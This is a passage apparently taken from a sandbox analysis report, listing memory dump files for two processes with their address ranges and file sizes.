                                      • memory/3880-176-0x00007FF81E410000-0x00007FF81E943000-memory.dmp

                                        Filesize

                                        5.2MB

                                      • memory/3880-64-0x00007FF82B3E0000-0x00007FF82B3ED000-memory.dmp

                                        Filesize

                                        52KB

                                      • memory/3880-60-0x00007FF821990000-0x00007FF821B19000-memory.dmp

                                        Filesize

                                        1.5MB

                                      • memory/3880-58-0x00007FF824CA0000-0x00007FF824CC5000-memory.dmp

                                        Filesize

                                        148KB

                                      • memory/3880-69-0x00007FF821D90000-0x00007FF821E5E000-memory.dmp

                                        Filesize

                                        824KB

                                      • memory/3880-52-0x00007FF825170000-0x00007FF82519B000-memory.dmp

                                        Filesize

                                        172KB

                                      • memory/3880-50-0x00007FF82B420000-0x00007FF82B43A000-memory.dmp

                                        Filesize

                                        104KB

                                      • memory/3880-72-0x00007FF82B490000-0x00007FF82B4B7000-memory.dmp

                                        Filesize

                                        156KB

                                      • memory/3880-78-0x00007FF827080000-0x00007FF827094000-memory.dmp

                                        Filesize

                                        80KB

                                      • memory/3880-98-0x00007FF825170000-0x00007FF82519B000-memory.dmp

                                        Filesize

                                        172KB

                                      • memory/3880-73-0x00007FF81E410000-0x00007FF81E943000-memory.dmp

                                        Filesize

                                        5.2MB

                                      • memory/3880-80-0x00007FF8214D0000-0x00007FF821583000-memory.dmp

                                        Filesize

                                        716KB

                                      • memory/3880-76-0x0000022ABEDC0000-0x0000022ABF2F3000-memory.dmp

                                        Filesize

                                        5.2MB

                                      • memory/3880-48-0x00007FF82B460000-0x00007FF82B46F000-memory.dmp

                                        Filesize

                                        60KB

                                      • memory/3880-30-0x00007FF82B490000-0x00007FF82B4B7000-memory.dmp

                                        Filesize

                                        156KB

                                      • memory/4380-134-0x000002885C430000-0x000002885C438000-memory.dmp

                                        Filesize

                                        32KB